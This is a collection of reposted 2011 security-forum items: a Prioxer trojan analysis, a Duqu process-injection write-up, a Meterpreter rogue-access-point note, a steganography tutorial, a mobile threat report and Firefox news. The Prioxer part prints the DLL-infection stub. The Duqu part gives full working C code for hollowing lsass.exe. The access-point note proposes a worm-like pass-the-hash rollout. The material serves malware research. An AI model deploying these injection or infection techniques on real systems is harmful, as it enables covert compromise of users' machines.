Overflow Exploitation, Step By Step Uploaded by DHAtEnclaveForensics on Nov 3, 2011 I previously had this chopped up into pieces that were pretty hard to watch. Now that I'm allowed to have videos longer than 15 minutes, I thought I'd give you the un-cut version! Here's the entire 1 hour talk from beginning to end. Links to the source code for the server being compromised and a blog entry can be found here: Metasploit Exploit Creation, Step By Step | Security, buffer overflow, exploits, Vulnerability, Metasploit, Tutorial | Enclave Forensics For other great short videos, try Auditcasts Durata: 01:04:57 Video: http://www.youtube.com/watch?v=8xonDJe3YxI&feature=youtube_gdata

Malware analysis - Prioxer 05/11/2011 ntroduction An (IRC) friend Horgh told me : "Why not study prioxer, it could be fun ?". But what is prioxer ? It's simply a backdoor Trojan, wich has a dropper with his own parser for NTFS and FAT format. That's why it's fun :], it was a cool way to study approximately how can work NTFS File System. Prioxer First I looked around for finding a sample ( 31 / 42 ) : MD5 : 7e3903944eab7b61b495572baa60fb72 SHA1 : 116930517baab6bdb0829990a43af54d155f5332 SHA256: 06e921abf28c4b260c59d61d84a74c3a5dc12ac99a34110ca5480ce61689385c The thing it will do is to infect the dll "dhcpcsvc.dll" ( we will see after what the purpose of the infection ). NTFS (This is not a tutorial about NTFS, it's just result af all the stuff reversed from prioxer, i wanted to have fun with IDA, and take some challenge by not looking too much documentation or source code like ntfs-3g, so if there is some mistake please refer to your friend google for more about NTFS). But it will not directly open an handle (CreateFile())on this file which is located in "%SYSTEMROOT%/System32/". It will open an handle on your current hard disk driver( like C: ). So here is a schem about how it works : The first thing, we must know on NTFS : all data stored on a volume is contained in file, including data structures used to locate and retrieve files. A NTFS Volume, will start every time, with a data structures, named NTFS Volume Boot Record, she is here for gathering a maximum of information about the volume, like Number Of Sector, or Bytes Per Sector, ... etc ... Then with thoses informations, we can access the MFT (Master File Table) which is the heart of the NTFS, it is implemented as an array of file records. Shel will contain one record, for each file on the volume including a record for the MFT itself. I will not describe all these files, but a special one : Root directory (also known as "\" or "$I30"). This file record contains an index of the files and directories stored in the root of the NTFS directory structure. You have understood that prioxer will use this File Record :]. But ! if you look at my schem, we know Root_Directory is the fifth entry in the array of file_record, and i don't know why they do that but they compute the offset to read this file_record with values found in in $DATA Attributes from MFT, why they don't compute the offset in this simply way : MFT_Addr + sizeof(FILE_ENTRY) * 5. Anyway, it's not important :], we continue your investigation. The thing to know is, that every FILE_RECORD has a list of attributes : (especially those) $DATA (0x80) : Contents of the file. $INDEX_ROOT, $ALLOCATION (0x90 / 0xA0): Implement file name allocation. And a new schem, how the mecanism work (I simplified things): A directory, is simply an index of file names (along with their file references), organized like a b-tree. VCN is Virtual Cluster Numbers, a vnc is a linked value to LCN (Logical Cluster Numbers) wich allow to read, write directly on the hardware disk. So, in your case prioxer will travel the root_directory, look for WINDOWS directory node, then travel "Windows" node, and get "SYSTEM32" node, and get dhcpcsvc.dll. And he is able now to read, write (with ReadFile() and WriteFile() API) directly to VCNs of this file. I will not explain more about NTFS, First I'm not familiar with this FileSystem (new for me), and working almost with IDA took me about 2 ~ 3 evenings to well understand how prioxer work. Next time, I will read some docs :], it will be easier. Ho by the way i wrote some shit for parsing only my root directory : FileSystemName = NTFS [+] Some information about NTFS BPB Sector Size = 512 Sector Per Cluster = 8 Reserved Sectors = 0 Media Descriptor ID = 248 Sector Per Track = 56 Number Of Heads = 255 Hidden Sectors = 56 TotalSectors = 41926023 Starting Cluster Number for the $MFT = 786432 Starting Cluster Number for the $MFTMirror = 2620376 Clusters Per File Record = 246 Clusters Per Index Block = 1 Volume Serial Number = [+] End Information about NTFS BPB + Sector Size = 512 bytes + Cluster Size = 4096 bytes + FileRecord Size = 1024 bytes Size = 0 [+] FILERECORDMAGIC OK + OffsetOfAttr = 38 [+] Information about actual ATTRIBUTE ATTRTYPE = 10 Value Length = 30 CreateTime = 2d458880 [+] Information about actual ATTRIBUTE ATTRTYPE = 30 Value Length = 44 ParentRef = 5 AllocSize = 0 RealSize = 0 [+] Information about actual ATTRIBUTE ATTRTYPE = 50 [+] Information about actual ATTRIBUTE ATTRTYPE = 90 NameLength = 4 NameOffset = 18 Name = $I30 Attrtype = 30 EntryOffset = 10 TotalEntrySize = 28 AllocEntrySize = 28 Flags = 1 FileReference = 0 Size = 18 StreamSize = 0 Flags = 3 -- INDEX ENTRY -- FileReference = 0 Size = 18 StreamSize = 0 Flags = 3 SUB NODE ! GetSubNodeVCN = 0 [+]STREAM OK ... Name : $AttrDef [+]STREAM OK ... Name : $BadClus [+]STREAM OK ... Name : $Bitmap [+]STREAM OK ... Name : $Boot [+]STREAM OK ... Name : $Extend [+]STREAM OK ... Name : $LogFile [+]STREAM OK ... Name : $MFT [+]STREAM OK ... Name : $MFTMirr [+]STREAM OK ... Name : $Secure [+]STREAM OK ... Name : $UpCase [+]STREAM OK ... Name : $Volume [+]STREAM OK ... Name : . [+]STREAM OK ... Name : AUTOEXEC.BAT [+]STREAM OK ... Name : boot.ini [+]STREAM OK ... Name : Bootfont.bin [+]STREAM OK ... Name : CONFIG.SYS [+]STREAM OK ... Name : Documents and Settings [+]STREAM OK ... Name : DOCUME~1 [+]STREAM OK ... Name : IO.SYS [+]STREAM OK ... Name : MSDOS.SYS [+]STREAM OK ... Name : NTDETECT.COM [+]STREAM OK ... Name : ntldr [+]STREAM OK ... Name : pagefile.sys [+]STREAM OK ... Name : Program Files [+]STREAM OK ... Name : PROGRA~1 [+]STREAM OK ... Name : RECYCLER [+]STREAM OK ... Name : System Volume Information [+]STREAM OK ... Name : SYSTEM~1 [+]STREAM OK ... Name : Toolz [+]STREAM OK ... Name : WINDOWS Last Index Entry -- END INDEX ENTRY -- LAST INDEX !!! [+] Information about actual ATTRIBUTE ATTRTYPE = a0 [+] Information about actual ATTRIBUTE ATTR_TYPE = b0 And here is the source code : main.c ReadCluster.c ntfs.h Infection Ok so now we know that prioxer will do some shit with this file, but what !? So prioxer will change the offset value, of "ServiceMain" exported function : And put some code in .text section located at ServiceMain changed offset : .text:7D4EC895 .text:7D4EC895 .text:7D4EC895 public ServiceMain .text:7D4EC895 ServiceMain proc near ; DATA XREF: .text:off_7D4D1FCCo .text:7D4EC895 inc ecx .text:7D4EC896 dec ecx .text:7D4EC897 add eax, 0 .text:7D4EC89A add edi, 0 .text:7D4EC89D or eax, 0 .text:7D4EC8A0 pusha .text:7D4EC8A1 inc edi .text:7D4EC8A2 dec edi .text:7D4EC8A3 push 'll' .text:7D4EC8A8 inc eax .text:7D4EC8A9 dec eax .text:7D4EC8AA push 'd.3i' .text:7D4EC8AF xor ebx, 0 .text:7D4EC8B2 push 'patc' .text:7D4EC8B7 mov edx, edx .text:7D4EC8B9 push esp ; lpLibFileName .text:7D4EC8BA or esi, 0 .text:7D4EC8BD call ds:__imp__LoadLibraryA@4 ; LoadLibraryA(x) .text:7D4EC8C3 xor ebx, 0 .text:7D4EC8C6 pop eax .text:7D4EC8C7 push eax .text:7D4EC8C8 pop eax .text:7D4EC8C9 pop eax .text:7D4EC8CA inc edx .text:7D4EC8CB dec edx .text:7D4EC8CC pop eax .text:7D4EC8CD mov esi, esi .text:7D4EC8CF popa .text:7D4EC8D0 add esi, 0 .text:7D4EC8D3 mov eax, offset _ServiceMain@8 ; ServiceMain(x,x) .text:7D4EC8D8 mov ecx, ecx .text:7D4EC8DA jmp eax .text:7D4EC8DA ServiceMain endp .text:7D4EC8DA .text:7D4EC8DA The snippet of code, will simply load a library with a random name in our case "ctapi3.dll", dropped by prioxer and then jump to the real address of ServiceMain. I will not study this dll (you can find her into ressource, directly), it simply a botnet component that can exchange commands and data over IRC with a command-and-control. Then it write a .bat file, and execute it for deleting the dropper. The only interesting thing was the infection method via a NTFS parser, and infect a windows dll, wihch will be load each time you want to use DHCP. Another interesting fact is a side effect of this technics, you can find a dllcache directory in %SYSTEMROOT%, NTFS maintains it for some often used system files. That's why if you are infected by this trojan, you won't be able to see the difference on dhcpsvc.dll, but a tools like gmer with his own ntfs parser can do it, or if you reboot your computer, you will be able to see it, and your AV too. Conclusion Big thanks to Horgh for the idea of prioxer, what is next target ? Sursa: w4kfu's bl0g

Easy Wireless Honey-Pots using Win7 and Metasploit I found myself inspired by Vivek Ramachandran’s videos, I thought I would take the honor in creating the simple meterpreter script that basically does what you see in the third installation of the Swse Addendum videos. When I watched the third video I thought to myself, “This shouldn’t be too difficult to do”. From my perception, I think that Vivek was kind of hinting that he might have wanted to see someone in the info-sec community create a meterpreter script that does what you see in this video. I was glad to do this. For penetration testers, this script means that they can now more easily setup rogue wireless access points by utilizing this script, that utilizes the soft ap feature that is implemented into Windows 7 and Windows 2008. If the victim computers are part of a Windows domain and have wireless NICs, by automating Metasploit with a pass-the-hash attack and using my script, one could essentially automate deploying a series of rogue ap points throughout a domain. This would be kind of like a network worm. If you’re curious about automating Metasploit, please see: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/8878/entry/documentation/msfconsole_rc_ruby_example.rc My script gives the end user the option if they want to install the meterpreter service on the victim computer. I thought that giving this option would be ideal for if the victim computer ends up rebooting. If you were just to deploy the soft AP and run a binding payload, the binding payload most likely wouldn’t survive a reboot. The script is available here: http://zitstif.no-ip.org/meterpreter/rogueap.rb http://zitstif.no-ip.org/meterpreter/rogueap.txt If you have any issues and you need help, feel free to contact me. Additionally, don’t hesitate to modify the script if you need/want to do so. via zitstif.no-ip.org Sursa: http://www.securityaegis.com/easy-wireless-honey-pots-using-win7-and-metasploit/

Steganography Made Easy in Linux Published on Friday, 04 November 2011 13:16 1. Introduction Steganography is the art of hiding messages within other messages or data. Most commonly we see this utilized with pictures. This is probably encryption at its finest. Mostly because it doesn't look like usual garbled text that we are used to seeing with encryption. The changes made by Steganography are so slight the human eye cannot perceive them. Even trained cryptographers may have an encoded message inside a picture and be unaware of it. There is a very deep science to this. Usually this is done by flipping parity bits at the binary level. While it is great to learn how this works, sometimes it can be a very tedious job. Fortunately for us there is a tool that will take away most of the grunt work. 2. Legal Disclaimer Before we begin, I should say that I do not condone the knowledge used in this article for anything other than hiding legal information. The purpose of this is to illustrate how to keep secrets safe. I should also note to please research your country's laws on encryption and its exportation before using this tool. No matter how free you believe your country is, you may be shocked to find out how stifling some of the laws on encryption are. 3. Installation SteGUI is a graphical front-end for the program know as Steghide. SteGUI is available for download as an rpm package and a tarball source. One might assume that source would compile flawlessly on Debian an Ubuntu since no deb package is provided. But while trying to compile from source with Debian Sid and Backtrack 5, I found myself in what is commonly known as "dependency hell". To save yourself some trouble and time just download the rpm package. From here you can just issue alien -d SteGUI.rpm to produce a Debian package that installs much easier. From there dpkg -i SteGUI.deb should install without problems. 4. Usage Once you are up and running the GUI is very simple to comprehend. From the File tab select "Open File" to choose a jpg file to use. While any jpg will do, very large messages will require very large pictures to hide them without altering images to the eye. Now that you have a jpg, go to the Actions tab and select "Embed". From here a box will pop up with a couple of requirements and options to fill out. In this example I have entered the path on my computer for a text file named passwd.txt into "File to embed for cover file". This would be the secret text that we wish to hide as it passes along the Internet. Next is the "File to use as cover" line. This is simply the path to the picture we wish to hide the passwd.txt inside. We must also select "File to use as output stegofile". We can name this anything, as long as we include the .jpg file extension. Here I simply chose out.jpg. We are going to leave all the check boxes as the defaults here. I would like to explain what some of these are for though. The encryption box here is rather interesting. There are several decent encryption ciphers offered here in the drop-down menu. Some you may have heard of like the Rijndael cipher, Blowfish, DES, and Triple-DES. While none of these are unbreakable, they're not exactly kid's stuff either. Next is the check box for compression. You might think this is counter-productive. After all too much compression can affect image quality, possibly giving away that the file has been altered. While this is true, what would you think if you found a .jpg that 17MB? Hopefully you would know something is wrong. While that's extreme, it illustrates my point. Compression is used to try and pack a file size back down to the original. The other check boxes should be self-explanatory. Let's look at the pass-phrase down at the bottom here. This is what the recipient of this message will use to open it. Needless to say, the normal rules should apply here as with regular passwords. Nothing in the dictionary, use upper and lower case along with some special characters. You can see from the asterisks in the picture here, I have quite a few characters in this password. I can't stress enough that a good pass-phrase is important. This is what unlocks your encryption and makes the text readable again. Without this, your encryption would be pointless against a brute-force attack. Now it is time for our recipient to open this file. After they open this jpg in SteGUI they simply go to the Actions tab and select “extract”. Another pop-up box will appear to input the necessary files. The input file at the top will simply be the jpg that we have sent them. The output file will be a new file we can name anything. Here I've just made it a file called out.txt. Now that we have our information in a text file we can easily open it for display. # cat out.txt password 5. White Noise While studying computer forensics, steganography came up a lot in my class. My professor had a lot of experience deciphering images while employed with the American FBI and Homeland Security. One day I asked him, "How do you know for sure what you are looking at isn't a false positive?" His answer floored me, "You don't until there's a pattern." So it occurred to me that one could probably gain security by producing a lot of white noise. White noise has many definitions. Especially when it comes to security. If one suspected their home was bugged. You could spend hours blasting annoying music in hopes to confuse or bore to sleep anyone listening in. In this case sending a lot of traffic of unaltered pictures before and after our encoded text. This may give the illusion that your altered jpg is a false positive since the last 24 you sent were clean. 6. Detection Stegdetect is a command-line program for detecting staganography in jpgs. It is also made by the same people who brought you Steghide and SteGUI. Stegdetech looks for algorithms used by other commercal steganography programs like Outguess, Jsteg, Jphide, Camoflage, AppendX and Invisible Secrets. It also offers a sub-program called Stegbreak that will use brute-force to find steganography made by the programs I just mentioned. About the only thing Stegdetect isn't good at doing is finding things made by Steghide! There was no option for searching it algorithms. I took a shot at searching the jpg we made with the parameters set to run all possible tests against it and came up with nothing. # stegdetect -t jopifa out.jpg out.jpg : negative There appears to be no ready built, open source software for finding steganography made by Steghide. At least not without thousands of dollars for proprietary forensics software. For now, cheaply deciphering messages made by Steghide or SteGUI will have to be done the old fashioned way. With a lot of ones and zeros. 7. Conclusion This is probably as easy as steganography will ever get. This program is impressive because it has taken something that used to only be done in binary and brought it down to point and click level. Some may see this dumbing down the art that steganography is. But in an emergency you need a tool that moves fast! Probably even the best binary programmer can't move as quickly as this GUI interface. Armed with speed, stealth, and weapons grade encryption, this open source program is a formidable adversary. Please show your support for the Steghide and SteGUI teams that made this tool possible. Visit our Linux forum if you have some questions in regards to this or any other Linux related topic. Sursa: http://how-to.linuxcareer.com/steganography-made-easy-in-linux

Lookout Mobile Threat Report August 2011 of Contents Highlights Research Methodology Why Mobile Security is Important Mobile OS Security Model Comparison Platform Vulnerabilities and Patch Management Mobile Threats Mobile Malware Trends What’s Next? Tips To Stay Safe About Lookout HIGHLIGHTS oo Both web-based and app-based threats are increasing in prevalence and sophistication. oo Android users are two and a half times as likely to encounter malware today than 6 months ago and three out of ten Android owners are likely to encounter a webbased threat on their device each year. oo An estimated half million to one million people were affected by Android malware in the first half of 2011; Android apps infected with malware went from 80 apps in January to over 400 apps cumulative in June 2011. oo Attackers are deploying a variety of increasingly sophisticated techniques to take control of the phone, personal data, and money. Additionally, malware writers are using new distribution techniques, such as malvertising and upgrade attacks. Download: https://www.mylookout.com/_downloads/lookout-mobile-threat-report-2011.pdf

Doqu - New method of injection 06/11/2011 Introduction I disovered a new method of injection (I don't know if it is really new) in a malware dropped by duqu. So I want to share it with you and as usual write a p0c. Injection Method The malware in question is simply a keylogger, but it uses a nice tricks for injecting into another process. First it will create (as usual) a suspended lsass.exe process via CreateProcess(). Then it will gather process information via ZwQueryInformationProcess(), especially PebBaseAddress. But what can he do with this address, if we look at PEB struct : >dt nt!_PEB +0x000 InheritedAddressSpace : UChar +0x001 ReadImageFileExecOptions : UChar +0x002 BeingDebugged : UChar +0x003 SpareBool : UChar +0x004 Mutant : Ptr32 Void +0x008 ImageBaseAddress : Ptr32 Void It will get the ImageBaseAddress at offset 0x8, by reading it with ReadProcessMemory(). Then it create a section with ZwCreateSection(), then it will in the actual process (not in lsass.exe supended), ZwMapViewOfSection() with argument BaseAdresse equal to ImageBaseAddress of lsass.exe process, then he will do the same operation on lsass.exe process, but wait ! if we read the documentation of ZwMapViewOfSection, we will get a NTSTATUS equal to STATUS_CONFLICTING_ADDRESSES, and the answer is no, because before the second ZwMapViewOfSection, it will perform ZwUn_mapViewOfSection() with BaseAddress equal to ImageBaseAddress on lsass.exe process. And if you wonder : "Wait what !? is it possible ?", and the answer is yes. With this tricks the malware is able to replace ALL the PE image of the suspended process. In my case it will replace entry point with a jmp to an another Section that it created before this tricks inside lsass.exe. p0c So I decided to rewrite this tricks, to well understand the stuff done by the malware ( maybe you will better understand what I explained before ). #include "main.h" int get_entrypoint(char read_proc) { IMAGE_DOS_HEADER idh = NULL; IMAGE_NT_HEADERS inh = NULL; idh = (IMAGE_DOS_HEADER)read_proc; inh = (IMAGE_NT_HEADERS )((BYTE)read_proc + idh->e_lfanew); printf("Entrypoint = %xn", inh->OptionalHeader.AddressOfEntryPoint); return (inh->OptionalHeader.AddressOfEntryPoint); } int main(void) { STARTUPINFO si; PROCESS_INFORMATION pi; char path_lsass[260]; PROCESS_BASIC_INFORMATION pbi; DWORD nb_read; DWORD ImageBase; HANDLE hsect; NTSTATUS stat; PVOID BaseAddress = NULL; PVOID BaseAddress2 = NULL; DWORD eip; memset(&si, 0, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); memset(&pi, 0, sizeof(PROCESS_INFORMATION)); memset(&pbi, 0, sizeof(PROCESS_BASIC_INFORMATION)); ExpandEnvironmentStrings(L"%SystemRoot%\system32\lsass.exe", (LPWSTR)path_lsass, 260); wprintf(L"[+] New Path for lsasse.exe = %sn", path_lsass); if (!CreateProcess((LPWSTR)path_lsass, NULL, NULL, NULL, NULL, CREATE_SUSPENDED|DETACHED_PROCESS|CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) { printf("[-] CreateProcessW failedn"); printf("LatError = %xn", GetLastError()); return (-1); } ZwQueryInformationProcess = (long (__stdcall )(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwQueryInformationProcess"); ZwMapViewOfSection = (long (__stdcall )(HANDLE,HANDLE,PVOID ,ULONG_PTR,SIZE_T,PLARGE_INTEGER,PSIZE_T,DWORD,ULONG,ULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwMapViewOfSection"); ZwUn_mapViewOfSection = (long (__stdcall )(HANDLE, PVOID))GetProcAddress(GetModuleHandleA("ntdll"),"ZwUn_mapViewOfSection"); ZwCreateSection = (long (__stdcall )(PHANDLE,ACCESS_MASK,PDWORD,PLARGE_INTEGER,ULONG,ULONG,HANDLE))GetProcAddress(GetModuleHandleA("ntdll"),"ZwCreateSection"); if (ZwMapViewOfSection == NULL || ZwQueryInformationProcess == NULL || ZwUn_mapViewOfSection == NULL || ZwCreateSection == NULL) { printf("[-] GetProcAddress failedn"); return (-1); } if (ZwQueryInformationProcess(pi.hProcess, 0, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) != 0) { printf("[-] ZwQueryInformation failedn"); return (-1); } printf("[+] UniqueProcessID = 0x%xn", pbi.UniqueProcessId); if (!ReadProcessMemory(pi.hProcess, (BYTE)pbi.PebBaseAddress + 8, &ImageBase, 4, &nb_read) && nb_read != 4) { printf("[-] ReadProcessMemory failedn"); return (-1); } printf("[+] ImageBase = 0x%xn", ImageBase); char read_proc[0x2000]; if (!ReadProcessMemory(pi.hProcess, (LPCVOID)ImageBase, read_proc, 0x2000, &nb_read) && nb_read != 0x2000) { printf("[-] ReadProcessMemory failedn"); return (-1); } printf("(dbg) Two first bytes : %c%cn", read_proc[0], read_proc[1]); eip = get_entrypoint(read_proc); LARGE_INTEGER a; a.HighPart = 0; a.LowPart = 0x8EF2; if ((stat = ZwCreateSection(&hsect, SECTION_ALL_ACCESS, NULL, &a, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) { printf("[-] ZwCreateSection failedn"); printf("[-] NTSTATUS = %xn", stat); return (-1); } SIZE_T size; size = 0x8000; BaseAddress = 0; BaseAddress = (PVOID)ImageBase; if ((stat = ZwMapViewOfSection(hsect, GetCurrentProcess(), &BaseAddress, NULL, NULL, NULL, &size, 1 /* ViewShare /, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) { printf("[-] ZwMapViewOfSection failedn"); printf("[-] NTSTATUS = %xn", stat); return (-1); } ZwUn_mapViewOfSection(pi.hProcess, BaseAddress); if ((stat = ZwMapViewOfSection(hsect, pi.hProcess, &BaseAddress, NULL, NULL, NULL, &size, 1 / ViewShare /, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) { printf("[-] ZwMapViewOfSection failedn"); printf("[-] NTSTATUS = %xn", stat); system("pause"); return (-1); } printf("[+] No more STATUS_CONFLICTING_ADDRESSES, let's insert a int3n"); memset((BYTE)read_proc + eip, 0xCC, 1); memcpy(BaseAddress, read_proc, 0x2000); ResumeThread(pi.hThread); system("pause"); return (0); } And the include file : #include <stdio.h> #include <Windows.h> #if !defined NTSTATUS typedef LONG NTSTATUS; #endif #define STATUS_SUCCESS 0 #if !defined PROCESSINFOCLASS typedef LONG PROCESSINFOCLASS; #endif #if !defined PPEB typedef struct _PEB *PPEB; #endif #if !defined PROCESS_BASIC_INFORMATION typedef struct _PROCESS_BASIC_INFORMATION { PVOID Reserved1; PPEB PebBaseAddress; PVOID Reserved2[2]; ULONG_PTR UniqueProcessId; PVOID Reserved3; } PROCESS_BASIC_INFORMATION; #endif; typedef LONG NTSTATUS, *PNTSTATUS; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef NTSTATUS (WINAPI * PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG); NTSTATUS (__stdcall *ZwQueryInformationProcess)( HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength OPTIONAL ); NTSTATUS (__stdcall *ZwCreateSection)( PHANDLE SectionHandle, ACCESS_MASK DesiredAccess, PDWORD ObjectAttributes OPTIONAL, PLARGE_INTEGER MaximumSize OPTIONAL, ULONG SectionPageProtection, ULONG AllocationAttributes, HANDLE FileHandle OPTIONAL ); NTSTATUS (__stdcall *ZwMapViewOfSection) ( HANDLE SectionHandle, HANDLE ProcessHandle, OUT PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect ); NTSTATUS (__stdcall *ZwUn_mapViewOfSection)( HANDLE ProcessHandle, PVOID BaseAddress ); So for the p0c i just put a INT3 at entry point of lsass.exe, and here the result : Conclusion This method is really fun because it don't use SetThreadContext(), for updating eip before resuming thread execution. Sursa: http://blog.w4kfu.com/post/new_method_of_injection IMPORTANT: Am inlocuit ZwUn mapViewOfSection cu ZwUn_mapViewOfSection (pentru ca nu puteam posta altfel, thanks Zatarra) Vedeti sursa.

Download Firefox 8 Final for Linux November 6th, 2011, 09:50 GMT - By Marius Nestor Dear readers, a few minutes ago Mozilla unleashed the stable version of the highly anticipated Mozilla Firefox 8.0 web browser for Linux, Windows and Macintosh operating systems. Yes, we're talking about the final version of Firefox 8, which is aready available for download on the official FTP site of the Mozilla company. Mozilla Firefox 8.0 brings new features, as well as performance and stability enhancements. Here are some of the most important ones: - Implemented Twitter search; - Tabs can now be loaded on demand, greatly improving start-up time; - Implemented an one-time add-on selection dialog to easily manage your installed extensions; - HTML5 context menus support; - Better memory performance; - Third party add-on are now disabled by default; - insertAdjacentHTML support; - Better CSS hyphen support; - Better WebSocket support; - CORS support. Mozilla Firefox 8.0 is supported on both 32-bit and 64-bit architectures, which means that it will run on any Linux distribution. Canonical will also update their supported Ubuntu releases to Firefox 8 via the official channels, just update your systems in a few days. Until then, download Mozilla Firefox 8 for Linux binaries and sources right now from Softpedia. Also, don't forget to visit our always up-to-date Firefox Extensions section for the latest add-ons! Download: http://linux.softpedia.com/get/Internet/HTTP-WWW-/Mozilla-Firefox-4-20864.shtml Versiunea 9.0.a2 Aurora: http://www.mozilla.org/en-US/firefox/aurora/ Sursa: http://news.softpedia.com/news/Download-Firefox-8-Final-for-Linux-232587.shtml